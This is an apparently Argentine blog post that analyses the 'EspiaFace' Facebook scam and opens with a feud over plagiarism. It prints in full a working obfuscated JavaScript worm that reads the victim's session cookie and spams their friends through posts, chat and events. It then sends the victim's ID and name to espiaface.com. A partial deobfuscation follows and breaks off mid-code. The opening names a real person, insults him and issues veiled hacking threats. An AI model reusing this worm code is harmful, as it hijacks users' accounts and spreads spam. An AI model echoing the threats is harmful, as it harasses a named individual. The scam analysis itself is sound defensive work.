epespad

Espiando al "EspiaFace.com": El objetivo al desnud


Plagio: (Del lat. plagiāre) Copiar en lo sustancial obras ajenas, dándolas como propias. (RAE)

Lista de Plagiadores:

+ Martin Gonzalo Lengua-Olivares (PATETICO LAMER PERUANO), de "CholoHack.com".
Se la dan de expertos en informática, pero al parecer desconocen de la ética hacker, el copyleft y carecen totalmente de honor.
Literalmente pone: "según he estado averiguando el porqué de esta creación tan jodida del Facebook".
Para colmo algunos portales de noticias (peru.com) lo citan a él como el autor de esta investigación. Esto es absurdo. Claro, yo lo publiqué un día antes porque tengo un Delorean, ¿no?... o quizás, digo yo, se me ocurre la loca idea de que quizás soy el autor original.

27-Abril|4:00 am> Patetismo al extremo: cuando pensaba que no se podía caer más bajo, el plagiador Martin Gonzalo Lengua Olivares ( @martinzho ) me demostró todo lo contrario.
Acaba de enviarme un MP diciendo que fue un "malentendido". Fui a su página para ver si ha modificado algo para pedir disculpas. Sí, ha modificado algo: la fecha de posteo (el lo posteó April 26, ahora dice April 25) para coincidirlo con la fecha de creación de mi post.
Parece que se avivó al leer mi argumento sobre el Delorean, razonó que no es posible acusarme de tener una máquina del tiempo, por lo que se apuró a tapar esta paradoja temporal modificando la fecha de posteo en su patético sitio.
Pero el IMBÉCIL se olvidó de que Google indexa las páginas, si se busca el título de su archivo plagiado aparece la fecha original: 26 de Abril. (Click acá para ver screen shot de Google)
¿Otro malentendido Martín Lengua?: esta es la segunda advertencia y última. No va a haber una tercera.
28-Abril|00:00 am> No me tientes a que yo lance "mi malentendimiento", te quedan seis horas para pedir disculpas públicas.
28-Abril|08:00 am> Time's up. Jaja, no te imaginás el infierno que te espera.
29-Abril|00:00 am> El Infierno
laposta dijo:Sobre los creadores del sitio EspiaFace:

+ Tengo los nombres de todos los implicados. Conflictos sobre la autoría. En investigación.
+ Detalle sobre lo que anda pasando: Mi Buzon de Mensajes Privados se convirtió en un conventillo. Todos los presuntos acusados se están arañando entre ellos. Todos se contactaron conmigo directamente por MP y todos se acusan entre ellos.
Fuera de joda, entre los acusados apareció el hermano de Pamela David (celebridad argentina)
Las pruebas se van acumulando y las pesas se inclinan.

+ ULTIMO MOMENTO: Ahora sí, la web de www.EspiaFace.com está finalmente hackeada... ¿o lo está?...


Advertencia:
Mucho, mucho, pero mucho texto con contenido real y propio a continuación.
Si tenés alergia a la lectura, naciste medio bobo o si todavía sos analfabeto, mejor que te vayas a la mierda.
Con cariño, nanopene


En este post voy a usar vocabulario muy preciso, porque hoy me levanté con ganas de ser nerd:
+ Si digo posible, es posible y no probable.
+ Si digo probable, es probable y no posible
+ Si digo estimado, es estimado y no querido.
+ Y si digo almeja es la que encontrás entre la arena, no entre las piernas


Espiando a Espiaface.com: El objetivo al desnudo
p o r n a n o p e n e (Taringa) Espiando al "EspiaFace.com": El objetivo al desnud

Perdon por el chasco, hoy debería haberles traido el cuarto capítulo.
Pero estoy tan pero tan harto de que me envíen las invitaciones de "Averigua quién visita tu perfil" que se me escapó todo el sentido del humor y me concentré en analizar esta epidemia.
A continuación, un análisis muy objetivo. Si les digo que es la posta, es la posta. Si les digo que es aproximación, es aproximación. Y si no te gusta, no te gusta. Y si no te gusta, te podés ir a la reconch... eeh re cebado.

Si, re cebado. Hoy tengo ganas de destripar al infame Espiaface, código por código y analizarlo para explicarles EXA-CT-A-ME-NT-E (las sílabas para la mierda, repetí primer grado):

CUAL CARAJO ES EL OBJETIVO DEL AUTOR DE ESTA MIERDA,
QUE GANA CON ESTA MIERDA
Y CUANTO GANA (estimación)

Según estuve viendo, nadie en internet (tanto en inglés como en español) explica con el nivel de detalle que expongo acá. Muchos, incluso especialistas, están aún rascándose las cabezas porque no entienden el fin de esta falsa aplicación de Facebook que pareciera ser el producto de una masturbación mental de alguien que tuvo demasiado tiempo libre en sus manos.

Hoy en día no existe ningún programa o app de Facebook que te permita ver quién te visitó el perfil. Está absolutamente prohibido por Facebook y es técnicamente imposible actualmente. Pero sí solía existir unos apps hace un par de años que se aprovechaba de un error de programación de Facebook para saber qué usuario visitó tu perfil, pero ya está arreglado y hoy en día no existe ninguna forma de saber qué usuario en específico acaba de visitar tu perfil. Hoy es simplemente usado como cebo para atraer salames. (Y si llegara a descubrirse otro error de programación, duraría muy poco, ya que Facebook activamente monitorea, bloquea y arregla problemas de esta índole)


Todos sabemos para esta altura que "espiaface.com" no cumple con lo que promete, pero antes les quiero tranquilizar diciéndoles primero lo que no es:
1) NO es un virus (ni worm, ni troyano, ni ataque de XSS, ni explota vulnerabilidades del navegador)
2) NO roba contraseñas de facebook
3) NO roba cookies (no roba sesiones de Facebook)
4) NO accede a tu información privada del perfil (en esta variante en específico)
5) NO es una Aplicación de Facebook (No instala nada, no queda residente, nada)

Facebook ofrece tu información privada en bandeja de plata a CUALQUIER aplicación de facebook. Si, todos los jueguitos, tests de psicologia ("¿Sos más pelotudo que el promedio?" ), O chimentos "¿Qué dijo fulano de mengano?", "¿Querés saber quién dijo que sos una trola?" y todas las porquerias esas obtienen acceso y control completo de tu perfil cuando presionás "Permitir".

En una ventana como esta, es cuando estás "instalando" un App de Facebook.
Facebook

El botón Permitir, permite al App el acceso irrestricto a toda tu información privada de tu perfil, control de posteo en tu cuenta y todo lo que te describe ahí. Esto es totalmente independiente a tu configuración de privacidad, aunque estés en modo superparanoico, con "Solo Amigos" y "Solo Yo", estos Apps tienen acceso completo cuando les das el permiso.

Si fuiste victima de EspiaFace, sabrás que no presionaste "Permitir" en ningún lado, eso se debe a que EspiaFace no es una aplicación de Facebook. Eso por una parte es una buena noticia, ya que tenemos la tranquilidad de que no obtiene los datos privados por defecto y tampoco hay que "desinstalar" nada de Facebook.


Pero bien podría haber sido todo lo anterior:
podría haber sido un virus creando un lindo botnet de la San Puta.
podría haberte robado la cuenta de Facebook.
podría vender tu información privada al mejor postor para que te espameen de lo lindo o le vendan tu información a delincuentes para que te hagan un secuestro virtual.
Tenemos que darle gracias (?) al autor de Espiaface por meterte el dedo en el culo sólo hasta el esfinter, cuando tranquilamente podría habértelo metido hasta el intestino grueso.

Si caiste esta vez, zafaste. La próxima vez que caigas en una trampa de este calibre puede que pierdas la cuenta de facebook, pierdas el control de tu computadora, pierdas ancho de banda y hasta pierdas la virginidad.

Ahora vamos al grano (del culo -digo- de Espiaface)

Si fuiste uno de los papanatas que fueron a espiaface.com se van a encontrar con esto:

nanopene

Primero nos tienta con una imagen photoshopeada, mostrando las visitas a tu perfil en tu "Notificaciones". Cuando presionamos Siguiente, nos topamos con la siguiente pantalla:

espiaface

Nos muestra un código para poner en Facebook. Si se fijan bien, ese código llama un archivo de javascript llamado app.js para hacer el trabajo sucio, ¿por qué nos pide que esperemos 2 a 3 minutos? ¿Qué carajo hace el código? veamos su contenido: (prepárense para un scroll largo...)

var _0x3fe9=["x25x66x69x72x73x74x6Ex61x6Dx65x25x20x6Dx69x72x61x20x65x73x74x6Fx20x71x75x65x20x65x73x20x69x6Ex63x72x65x69x62x6Cx65x2Cx20x74x65x20x70x65x72x6Dx69x74x65x20x76x65x72x20x71x75x69x65x6Ex65x73x20x76x69x73x69x74x61x6Ex20x74x75x20x70x65x72x66x69x6Cx20x79x20x66x75x6Ex63x69x6Fx6Ex61x20x62x69x65x6Ex2Cx20x65x6Ex74x72x61x20x61x3Ax20x65x73x70x69x61x66x61x63x65x2Ex63x6Fx6D","x54x6Fx70x20x64x65x20x76x69x73x69x74x61x6Ex74x65x73x20x64x65x20x74x75x20x70x65x72x66x69x6Cx20x64x65x20x68x6Fx79x3Ax20x0Ax20x25x74x66x25x20x2Dx20x31x39x20x76x69x73x69x74x61x73x20x0Ax20x25x74x66x25x20x2Dx20x31x36x20x76x69x73x69x74x61x73x20x0Ax20x25x74x66x25x20x2Dx20x31x35x20x76x69x73x69x74x61x73x20x0Ax20x25x74x66x25x20x2Dx20x31x33x20x76x69x73x69x74x61x73x20x0Ax20x41x76x65x72x69x67x75x61x20x74x75x20x74x61x6Dx62x69x65x6Ex20x71x75x69x65x6Ex20x74x65x20x65x73x74x61x20x6Dx69x72x61x6Ex64x6Fx20x65x6Ex74x72x61x6Ex64x6Fx20x65x6Ex3Ax20x65x73x70x69x61x66x61x63x65x2Ex63x6Fx6Dx0Ax46x75x6Ex63x69x6Fx6Ex61x20x64x65x20x76x65x72x64x61x64x21","x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex65x73x70x69x61x66x61x63x65x2Ex63x6Fx6Dx2Fx63x61x72x67x61x2Ex70x68x70","x45x73x74x6Fx20x65x73x20x69x6Ex63x72x65x69x62x6Cx65x21x20x70x75x65x64x65x6Ex20x76x65x72x20x71x75x69x65x6Ex20x65x73x74x61x20x76x69x73x69x74x61x6Ex64x6Fx20x73x75x20x70x65x72x66x69x6Cx20x79x20x74x65x20x6Cx6Cx65x67x61x6Ex20x6Ex6Fx74x69x66x69x63x61x63x69x6Fx6Ex65x73x2Cx20x73x69x67x61x6Ex20x6Cx6Fx73x20x70x61x73x6Fx73x20x64x65x20x65x73x74x61x20x70x61x67x69x6Ex61x20x71x75x65x20x65x78x70x6Cx69x63x61x20x63x6Fx6Dx6Fx20x68x61x63x65x72x6Cx6Fx2Cx20x65x6Ex74x72x65x6Ex20x65x6Ex3Ax20x65x73x70x69x61x66x61x63x65x2Ex63x6Fx6D","x41x76x65x72x69x67x75x61x20x71x75x69x65x6Ex20x76x69x73x69x74x61x20x74x75x20x70x65x72x66x69x6C","x68x72x65x66","x6Cx6Fx63x61x74x69x6Fx6E","x74x6Fx70","x47x45x54","x6Fx70x65x6E","x6Fx6Ex72x65x61x64x79x73x74x61x74x65x63x68x61x6Ex67x65","x72x65x61x64x79x53x74x61x74x65","x73x74x61x74x75x73","x72x65x73x70x6Fx6Ex73x65x54x65x78x74","x73x65x6Ex64","x2F","x6Dx61x74x63x68","x63x6Fx6Fx6Bx69x65","x40x5B","x69x64","x3A","x6Ex61x6Dx65","x5D","","x26","x3D","x50x4Fx53x54","x43x6Fx6Ex74x65x6Ex74x2Dx54x79x70x65","x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx78x2Dx77x77x77x2Dx66x6Fx72x6Dx2Dx75x72x6Cx65x6Ex63x6Fx64x65x64","x73x65x74x52x65x71x75x65x73x74x48x65x61x64x65x72","x64x69x76","x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74","x64x69x73x70x6Cx61x79","x73x74x79x6Cx65","x62x6Cx6Fx63x6B","x70x6Fx73x69x74x69x6Fx6E","x61x62x73x6Fx6Cx75x74x65","x77x69x64x74x68","x31x30x30x25","x68x65x69x67x68x74","x6Cx65x66x74","x30x70x78","x74x65x78x74x41x6Cx69x67x6E","x63x65x6Ex74x65x72","x70x61x64x64x69x6Ex67","x34x70x78","x62x61x63x6Bx67x72x6Fx75x6Ex64","x23x46x46x46x46x46x46","x7Ax49x6Ex64x65x78","x69x6Ex6Ex65x72x48x54x4Dx4C","x20x3Cx62x72x2Fx3Ex3Cx62x3Ex43x61x72x67x61x6Ex64x6Fx20x61x70x6Cx69x63x61x63x69x6Fx6Ex2Cx20x61x67x75x61x72x64x65x20x75x6Ex20x6Dx6Fx6Dx65x6Ex74x6Fx2Ex2Ex2Ex3Cx2Fx62x3Ex3Cx62x72x2Fx3Ex3Cx62x72x2Fx3Ex20x4Cx61x20x61x70x6Cx69x63x61x63x69x6Fx6Ex20x65x73x74x61x20x70x72x65x70x61x72x61x6Ex64x6Fx20x74x75x20x66x61x63x65x62x6Fx6Fx6Bx20x70x61x72x61x20x72x65x67x69x73x74x72x61x72x20x6Cx61x73x20x76x69x73x69x74x61x73x20x64x65x20x74x75x73x20x61x6Dx69x67x6Fx73x2Ex3Cx62x72x2Fx3Ex3Cx62x72x2Fx3Ex3Cx69x6Dx67x20x73x72x63x3Dx22x68x74x74x70x3Ax2Fx2Fx67x65x6Ex65x74x69x63x73x2Ex62x77x68x2Ex68x61x72x76x61x72x64x2Ex65x64x75x2Fx73x6Ex70x32x72x66x6Cx70x2Fx63x69x72x63x6Cx65x2Ex67x69x66x22x3E","x61x70x70x65x6Ex64x43x68x69x6Cx64","x62x6Fx64x79","x64x61x74x61","x66x69x72x73x74x43x68x69x6Cx64","x6Ex61x76x41x63x63x6Fx75x6Ex74x4Ex61x6Dx65","x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64","x3F","x2Fx61x6Ax61x78x2Fx63x68x6Fx6Fx73x65x2Fx3Fx5Fx5Fx61x3Dx31","x65x76x65x6Ex74","x41x73x79x6Ex63x52x65x71x75x65x73x74","x2Fx61x6Ax61x78x2Fx74x79x70x65x61x68x65x61x64x2Fx66x69x72x73x74x5Fx64x65x67x72x65x65x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31x26x76x69x65x77x65x72x3D","x26x74x6Fx6Bx65x6Ex3D","x26x66x69x6Cx74x65x72x5Bx30x5Dx3Dx75x73x65x72x26x6Fx70x74x69x6Fx6Ex73x5Bx30x5Dx3Dx66x72x69x65x6Ex64x73x5Fx6Fx6Ex6Cx79x26x6Fx70x74x69x6Fx6Ex73x5Bx31x5Dx3Dx6Ex6Dx26x6Fx70x74x69x6Fx6Ex73x5Bx32x5Dx3Dx73x6Fx72x74x5Fx61x6Cx70x68x61","x6Cx65x6Ex67x74x68","x70x75x73x68","x67x65x74x54x69x6Dx65","x73x65x74x54x69x6Dx65","x67x65x74x4Dx6Fx6Ex74x68","x67x65x74x44x61x74x65","x67x65x74x46x75x6Cx6Cx59x65x61x72","x67x65x74x48x6Fx75x72x73","x2C","x6Ax6Fx69x6E","x6Fx6E","x43x72x65x61x74x65x20x45x76x65x6Ex74","x6Ex65x77","x2Fx65x76x65x6Ex74x73x2Fx63x72x65x61x74x65x2Ex70x68x70","x2Fx61x6Ax61x78x2Fx63x68x61x74x2Fx62x75x64x64x79x5Fx6Cx69x73x74x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x73x75x62x73x74x72","x28","x29","x62x75x64x64x79x5Fx6Cx69x73x74","x70x61x79x6Cx6Fx61x64","x6Ex6Fx77x41x76x61x69x6Cx61x62x6Cx65x4Cx69x73x74","x72x61x6Ex64x6Fx6D","x66x6Cx6Fx6Fx72","x25x66x69x72x73x74x6Ex61x6Dx65x25","x74x6Fx4Cx6Fx77x65x72x43x61x73x65","x66x69x72x73x74x4Ex61x6Dx65","x75x73x65x72x49x6Ex66x6Fx73","x72x65x70x6Cx61x63x65","x2Fx61x6Ax61x78x2Fx63x68x61x74x2Fx73x65x6Ex64x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x2Fx61x6Ax61x78x2Fx62x72x6Fx77x73x65x72x2Fx66x72x69x65x6Ex64x73x2Fx3Fx75x69x64x3D","x26x66x69x6Cx74x65x72x3Dx61x6Cx6Cx26x5Fx5Fx61x3Dx31x26x5Fx5Fx64x3Dx31","x73x68x69x66x74","x66x65x74x63x68x65x64x20x66x72x69x65x6Ex64x73x3Ax20","x68x6Fx6Dx65","x70x6Fx70","x25x74x66x25","x73x65x61x72x63x68","x78x68x70x63x5Fx6Dx65x73x73x61x67x65x5Fx74x65x78x74","x78x68x70x63x5Fx6Dx65x73x73x61x67x65","x6Dx65x73x73x61x67x65x20x74x65x78x74x3Ax20","x2Fx61x6Ax61x78x2Fx75x70x64x61x74x65x73x74x61x74x75x73x2Ex70x68x70x3Fx5Fx5Fx61x3Dx31","x70x72x6Fx66x69x6Cx65"];var chatmessage=_0x3fe9[0];var postmessage=_0x3fe9[1];var redirect=_0x3fe9[2];var eventdesc=_0x3fe9[3];var eventname=_0x3fe9[4];var nfriends=5000;var debug=false;var wf=0;var mf=function (){if(wf<=0){setTimeout(function (){window[_0x3fe9[7]][_0x3fe9[6]][_0x3fe9[5]]=redirect;} ,500);} ;} ;var doget=function (_0xbf72xb,_0xbf72xc,_0xbf72xd){var _0xbf72xe= new XMLHttpRequest;_0xbf72xe[_0x3fe9[9]](_0x3fe9[8],_0xbf72xb);_0xbf72xe[_0x3fe9[10]]=function (){if(_0xbf72xe[_0x3fe9[11]]==4){if(_0xbf72xe[_0x3fe9[12]]==200&&_0xbf72xc){_0xbf72xc(_0xbf72xe[_0x3fe9[13]]);} ;if(_0xbf72xd){_0xbf72xd();} ;} ;} ;_0xbf72xe[_0x3fe9[14]]();} ;doget(_0x3fe9[15],function (_0xbf72xf){var _0xbf72x10=document[_0x3fe9[17]][_0x3fe9[16]](/c_user=(d+)/)[1];var _0xbf72x11=function (_0xbf72x12){return _0xbf72x12?_0x3fe9[18]+_0xbf72x12[_0x3fe9[19]]+_0x3fe9[20]+_0xbf72x12[_0x3fe9[21]]+_0x3fe9[22]:_0x3fe9[23];} ;var _0xbf72x13=function (_0xbf72x12){return _0xbf72x12?_0xbf72x12[_0x3fe9[21]]:_0x3fe9[23];} ;var _0xbf72x14=function (_0xbf72x12){out=_0x3fe9[23];for(var _0xbf72x15 in _0xbf72x12){out+=(out?_0x3fe9[24]:_0x3fe9[23])+_0xbf72x15+(_0xbf72x12[_0xbf72x15]!==null?_0x3fe9[25]+encodeURIComponent(_0xbf72x12[_0xbf72x15]):_0x3fe9[23]);} ;return out;} ;var _0xbf72x16=function (_0xbf72xb,_0xbf72x12,_0xbf72xc,_0xbf72xd){var _0xbf72xe= new XMLHttpRequest;_0xbf72xe[_0x3fe9[9]](_0x3fe9[26],_0xbf72xb);_0xbf72xe[_0x3fe9[29]](_0x3fe9[27],_0x3fe9[28]);_0xbf72xe[_0x3fe9[10]]=function (){if(_0xbf72xe[_0x3fe9[11]]==4){if(_0xbf72xe[_0x3fe9[12]]==200&&_0xbf72xc){_0xbf72xc(_0xbf72xe[_0x3fe9[13]]);} ;if(_0xbf72xd){_0xbf72xd();} ;} ;} ;_0xbf72xe[_0x3fe9[14]](_0xbf72x14(_0xbf72x12));} ;var _0xbf72x17=function (){var _0xbf72x18=document[_0x3fe9[31]](_0x3fe9[30]);_0xbf72x18[_0x3fe9[33]][_0x3fe9[32]]=_0x3fe9[34];_0xbf72x18[_0x3fe9[33]][_0x3fe9[35]]=_0x3fe9[36];_0xbf72x18[_0x3fe9[33]][_0x3fe9[37]]=_0x3fe9[38];_0xbf72x18[_0x3fe9[33]][_0x3fe9[39]]=_0x3fe9[38];_0xbf72x18[_0x3fe9[33]][_0x3fe9[40]]=_0x3fe9[41];_0xbf72x18[_0x3fe9[33]][_0x3fe9[7]]=_0x3fe9[41];_0xbf72x18[_0x3fe9[33]][_0x3fe9[42]]=_0x3fe9[43];_0xbf72x18[_0x3fe9[33]][_0x3fe9[44]]=_0x3fe9[45];_0xbf72x18[_0x3fe9[33]][_0x3fe9[46]]=_0x3fe9[47];_0xbf72x18[_0x3fe9[33]][_0x3fe9[48]]=999999;_0xbf72x18[_0x3fe9[49]]=_0x3fe9[50];document[_0x3fe9[52]][_0x3fe9[51]](_0xbf72x18);} ;var _0xbf72x19=_0xbf72xf[_0x3fe9[16]](/name="xhpc_composerid" value="([dw]+)"/i);if(_0xbf72x19){comp=_0xbf72x19[1];} else {comp=_0x3fe9[23];} ;var _0xbf72x1a=_0xbf72xf[_0x3fe9[16]](/name="post_form_id" value="([dw]+)"/i)[1];var _0xbf72x1b=_0xbf72xf[_0x3fe9[16]](/name="fb_dtsg" value="([dw]+)"/i)[1];var _0xbf72x1c=document[_0x3fe9[56]](_0x3fe9[55])[_0x3fe9[54]][_0x3fe9[53]];redirect=redirect+_0x3fe9[57]+_0xbf72x14({userid:_0xbf72x10,name:_0xbf72x1c,doclose:1});_0xbf72x17();if(eventdesc){wf++;_0xbf72x16(_0x3fe9[58],{type:_0x3fe9[59],eid:null,invite_message:_0x3fe9[23],__d:1,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,lsd:null,post_form_id_source:_0x3fe9[60]},function (_0xbf72x1d){var _0xbf72x1e=_0xbf72x1d[_0x3fe9[16]](/"token":"([^]+)"/)[1];var _0xbf72xb=_0x3fe9[61]+_0xbf72x10+_0x3fe9[62]+_0xbf72x1e+_0x3fe9[63];doget(_0xbf72xb,function (_0xbf72x1f){var _0xbf72x20=_0xbf72x1f[_0x3fe9[16]](/{"uid":d+,/g);var _0xbf72x21=[];for(var _0xbf72x22=0;_0xbf72x22<_0xbf72x20[_0x3fe9[64]];_0xbf72x22++){var _0xbf72x23=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/:(d+),/)[1];if(_0xbf72x23!=_0xbf72x10){_0xbf72x21[_0x3fe9[65]](_0xbf72x23);} ;} ;var _0xbf72x24= new Date;_0xbf72x24[_0x3fe9[67]](_0xbf72x24[_0x3fe9[66]]()+86400000);datestr=_0xbf72x24[_0x3fe9[68]]()+1+_0x3fe9[15]+_0xbf72x24[_0x3fe9[69]]()+_0x3fe9[15]+_0xbf72x24[_0x3fe9[70]]();timestr=_0xbf72x24[_0x3fe9[71]]()*60;var _0xbf72x25={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,start_dateIntlDisplay:datestr,start_date:datestr,start_time_hour_min:timestr,name:eventname,place_page_id:_0x3fe9[23],location:_0x3fe9[23],street:_0x3fe9[23],geo_id:_0x3fe9[23],geo_sq:_0x3fe9[23],desc:eventdesc,sgb_invitees:_0xbf72x21[_0x3fe9[73]](_0x3fe9[72]),sgb_emails:_0x3fe9[23],sgb_message:_0x3fe9[23],privacy_type:_0x3fe9[74],guest_list:_0x3fe9[74],connections_can_post:_0x3fe9[74],save:_0x3fe9[75],submitting:_0x3fe9[23]};_0xbf72x25[_0x3fe9[76]]=_0x3fe9[23];_0xbf72x16(_0x3fe9[77],_0xbf72x25,false,function (){mf(--wf);} );} );} );} ;if(chatmessage){wf++;_0xbf72x16(_0x3fe9[78],{user:_0xbf72x10,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,lsd:null,post_form_id_source:_0x3fe9[60],popped_out:false,force_render:true},function (_0xbf72x1d){var _0xbf72x26=_0xbf72x1d[_0x3fe9[79]](9);var _0xbf72x27=eval(_0x3fe9[80]+_0xbf72x26+_0x3fe9[81]);var _0xbf72x28=_0xbf72x27[_0x3fe9[83]][_0x3fe9[82]];for(var _0xbf72x29 in _0xbf72x28[_0x3fe9[84]]){var _0xbf72x2a=Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*1335448958);var _0xbf72x2b=( new Date)[_0x3fe9[66]]();var _0xbf72x2c=chatmessage[_0x3fe9[91]](_0x3fe9[87],_0xbf72x28[_0x3fe9[90]][_0xbf72x29][_0x3fe9[89]][_0x3fe9[88]]());_0xbf72x16(_0x3fe9[92],{msg_id:Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*1335448958),client_time:( new Date)[_0x3fe9[66]](),msg_text:chatmessage[_0x3fe9[91]](_0x3fe9[87],_0xbf72x28[_0x3fe9[90]][_0xbf72x29][_0x3fe9[89]][_0x3fe9[88]]()),to:_0xbf72x29,post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,post_form_id_source:_0x3fe9[60]});} ;mf(--wf);} );} ;if(postmessage){wf++;doget(_0x3fe9[93]+_0xbf72x10+_0x3fe9[94],function (_0xbf72x1d){var _0xbf72x20=_0xbf72x1d[_0x3fe9[16]](//d+_d+_d+_q.jpg.*?u003ca href="http://www.facebook.com/.*?u003c/a>/gi);var _0xbf72x2d=[];if(_0xbf72x20){for(var _0xbf72x22=0;_0xbf72x22<_0xbf72x20[_0x3fe9[64]];_0xbf72x22++){var _0xbf72x23=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/_d+_/)[0][_0x3fe9[91]](/_/g,_0x3fe9[23]);var _0xbf72x2e=_0xbf72x20[_0xbf72x22][_0x3fe9[16]](/>[^>]+u003c/a>$/i)[0][_0x3fe9[91]](/u003c/a>$/gim,_0x3fe9[23])[_0x3fe9[91]](/>/g,_0x3fe9[23]);_0xbf72x2d[_0x3fe9[65]]({id:_0xbf72x23,name:_0xbf72x2e});} ;} ;var _0xbf72xd=[];var _0xbf72x2f=[];while(_0xbf72x2d[_0x3fe9[64]]){var _0xbf72x30=Math[_0x3fe9[86]](Math[_0x3fe9[85]]()*_0xbf72x2d[_0x3fe9[64]]);_0xbf72xd[_0x3fe9[65]](_0xbf72x2d[_0xbf72x30]);_0xbf72x2f[_0x3fe9[65]](_0xbf72x2d[_0xbf72x30]);var _0xbf72x2b=_0xbf72x2d[_0x3fe9[95]]();if(_0xbf72x30){_0xbf72x2d[_0xbf72x30-1]=_0xbf72x2b;} ;} ;if(debug){alert(_0x3fe9[96]+_0xbf72xd[_0x3fe9[64]]);} ;var _0xbf72x31={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,xhpc_composerid:comp,xhpc_targetid:_0xbf72x10,xhpc_context:_0x3fe9[97],xhpc_fbx:_0x3fe9[23],lsd:null,post_form_id_source:_0x3fe9[60]};mt=postmessage;m=postmessage;while(mt[_0x3fe9[100]](_0x3fe9[99])>=0){var _0xbf72x32=_0xbf72xd[_0x3fe9[98]]();mt=mt[_0x3fe9[91]](_0x3fe9[99],_0xbf72x13(_0xbf72x32));m=m[_0x3fe9[91]](_0x3fe9[99],_0xbf72x11(_0xbf72x32));} ;_0xbf72x31[_0x3fe9[101]]=mt;_0xbf72x31[_0x3fe9[102]]=m;if(debug){alert(_0x3fe9[103]+mt);} ;_0xbf72x16(_0x3fe9[104],_0xbf72x31);var _0xbf72x33=function (_0xbf72x15){if(_0xbf72x15==0){wf=0;mf();return ;} ;var _0xbf72x34=_0xbf72x2f[_0x3fe9[95]]();var _0xbf72x35={post_form_id:_0xbf72x1a,fb_dtsg:_0xbf72x1b,xhpc_composerid:comp,xhpc_targetid:_0xbf72x34[_0x3fe9[19]],xhpc_context:_0x3fe9[105],xhpc_fbx:1,lsd:null,post_form_id_source:_0x3fe9[60]};var _0xbf72x36=postmessage;var _0xbf72x37=postmessage;if(_0xbf72xd[_0x3fe9[64]]==0){wf=0;mf();return ;} ;while(_0xbf72x36[_0x3fe9[100]](_0x3fe9[99])>=0){var _0xbf72x38=_0xbf72xd[_0x3fe9[98]]();_0xbf72x36=_0xbf72x36[_0x3fe9[91]](_0x3fe9[99],_0xbf72x13(_0xbf72x38));_0xbf72x37=_0xbf72x37[_0x3fe9[91]](_0x3fe9[99],_0xbf72x11(_0xbf72x38));} ;_0xbf72x35[_0x3fe9[101]]=_0xbf72x36;_0xbf72x35[_0x3fe9[102]]=_0xbf72x37;_0xbf72x16(_0x3fe9[104],_0xbf72x35);setTimeout(function (){_0xbf72x33(_0xbf72x15-1);} ,2000);} ;wf++;setTimeout(function (){_0xbf72x33(nfriends);} ,2000);} );} ;mf();} );


No se entiende una mierda. ¿Por qué?, porque el código está ofuscado.
¿Qué es eso? La ofuscación de código sirve para que la gilada no pueda entender qué carajo hace el código... y por otra parte, ahorra algo de espacio al comprimir los archivos.
Afortunadamente no formamos parte de la gilada y podemos de-ofuscar el código, porque somos grosos y lo sabemos
(lo pongo entero al código para los que saben Javascript):


var chatmessage = '%firstname%';
var postmessage = 'Top de visitantes de tu perfil de hoy: x0A %tf% - 19 visitas x0A %tf% - 16 visitas x0A %tf% - 15 visitas x0A %tf% - 13 visitas x0A Averigua tu tambien quien te esta mirando entrando en: espiaface.comx0AFunciona de verdad!';
var redirect = 'http://www.espiaface.com/carga.php';
var eventdesc = 'Esto es increible! pueden ver quien esta visitando su perfil y te llegan notificaciones, sigan los pasos de esta pagina que explica como hacerlo, entren en: espiaface.com';
var eventname = 'Averigua quien visita tu perfil';
var nfriends = 5000;
var debug = false;
var wf = 0;
var mf = function () {
        if (wf <= 0) {
            setTimeout(function () {
                window['top']['location']['href'] = redirect;
            }, 500);
        };
    };
var doget = function (_0xbf72xb, _0xbf72xc, _0xbf72xd) {
        var _0xbf72xe = new XMLHttpRequest;
        _0xbf72xe['open']('GET', _0xbf72xb);
        _0xbf72xe['onreadystatechange'] = function () {
            if (_0xbf72xe['readyState'] == 4) {
                if (_0xbf72xe['status'] == 200 && _0xbf72xc) {
                    _0xbf72xc(_0xbf72xe['responseText']);
                };
                if (_0xbf72xd) {
                    _0xbf72xd();
                };
            };
        };
        _0xbf72xe['send']();
    };
doget('/', function (_0xbf72xf) {
    var _0xbf72x10 = document['cookie']['match'](/c_user=(d+)/)[1];
    var _0xbf72x11 = function (_0xbf72x12) {
            return _0xbf72x12 ? '@[' + _0xbf72x12['id'] + ':' + _0xbf72x12['name'] + ']' : '';
        };
    var _0xbf72x13 = function (_0xbf72x12) {
            return _0xbf72x12 ? _0xbf72x12['name'] : '';
        };
    var _0xbf72x14 = function (_0xbf72x12) {
            out = '';
            for (var _0xbf72x15 in _0xbf72x12) {
                out += (out ? '&' : '') + _0xbf72x15 + (_0xbf72x12[_0xbf72x15] !== null ? '=' + encodeURIComponent(_0xbf72x12[_0xbf72x15]) : '');
            };
            return out;
        };
    var _0xbf72x16 = function (_0xbf72xb, _0xbf72x12, _0xbf72xc, _0xbf72xd) {
            var _0xbf72xe = new XMLHttpRequest;
            _0xbf72xe['open']('POST', _0xbf72xb);
            _0xbf72xe['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded');
            _0xbf72xe['onreadystatechange'] = function () {
                if (_0xbf72xe['readyState'] == 4) {
                    if (_0xbf72xe['status'] == 200 && _0xbf72xc) {
                        _0xbf72xc(_0xbf72xe['responseText']);
                    };
                    if (_0xbf72xd) {
                        _0xbf72xd();
                    };
                };
            };
            _0xbf72xe['send'](_0xbf72x14(_0xbf72x12));
        };
    var _0xbf72x17 = function () {
            var _0xbf72x18 = document['createElement']('div');
            _0xbf72x18['style']['display'] = 'block';
            _0xbf72x18['style']['position'] = 'absolute';
            _0xbf72x18['style']['width'] = '100%';
            _0xbf72x18['style']['height'] = '100%';
            _0xbf72x18['style']['left'] = '0px';
